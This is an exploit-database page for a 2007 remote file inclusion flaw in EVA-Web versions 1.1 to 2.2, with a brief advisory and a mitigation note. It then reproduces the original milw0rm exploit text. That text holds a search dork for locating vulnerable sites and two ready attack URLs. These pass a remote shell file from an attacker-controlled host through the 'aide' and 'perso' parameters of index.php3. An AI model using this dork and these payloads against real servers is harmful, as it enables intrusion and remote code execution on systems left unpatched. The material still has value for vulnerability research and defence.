header-logo
Suggest Exploit
vendor:
EVA-Web
by:
MurderSkillz
7.5
CVSS
HIGH
Remote File Inclusion
22
CWE
Product Name: EVA-Web
Affected Version From: 1.1
Affected Version To: 2.2
Patch Exists: YES
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

EVA-Web 1.1<=2.2 Remote File Inclusion

The EVA-Web version 1.1 to 2.2 is vulnerable to remote file inclusion. An attacker can exploit this vulnerability to include arbitrary files from a remote server, potentially leading to remote code execution.

Mitigation:

Apply the patch released by the vendor to fix the vulnerability.
Source

Exploit-DB raw data:

###############################################################################################
#         ___   ___                         _
#        / _ \ / _ \                       | |
#   __ _| | | | | | |_ __  ___   _ __   ___| |_
#  / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __|
# | (_| | |_| | |_| | | | \__ \_| | | |  __/ |_
#  \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__|
#   __/ |
#  |___/
###############################################################################################
#Program Title ################################################################################
#EVA-Web 1.1<=2.2 Remote File Inclusion
#
#Note #######################################################################################
#A patch was released some time ago..but there was never an exploit released..
#
#Script Download ##############################################################################
#http://spip-edu.edres74.net
#
#d0rk ######################################################################################
#"et utilise le squelette EVA-Web" -3.0 -2.3
#
#Spl0it #########################################################################################
#www.victim.com/[path to webapp]/eva/index.php3?aide=http://www.ursite.com/shell.txt?
#www.victim.com/[path to webapp]/eva/index.php3?perso=http://www.ursite.com/shell.txt?
#
#vuln discovered by ###############################################################################
#MurderSkillz
#
#shoutz: z3r0, milf, godxcel, clorox, katalyst, SyNiCaL, OD, pr0be, rezen, str0ke,
#fish, rey, canuck, ,vipsta, c0ma, grumpy, err0r, sick, trintitty, asdfhacks.com , a59, freeillwill.com, fury,
#<S>, Bernard, and everyone else at g00ns.net
###############################################################################################

# milw0rm.com [2007-06-26]

Navigation

Suggest Exploit

Services By CQR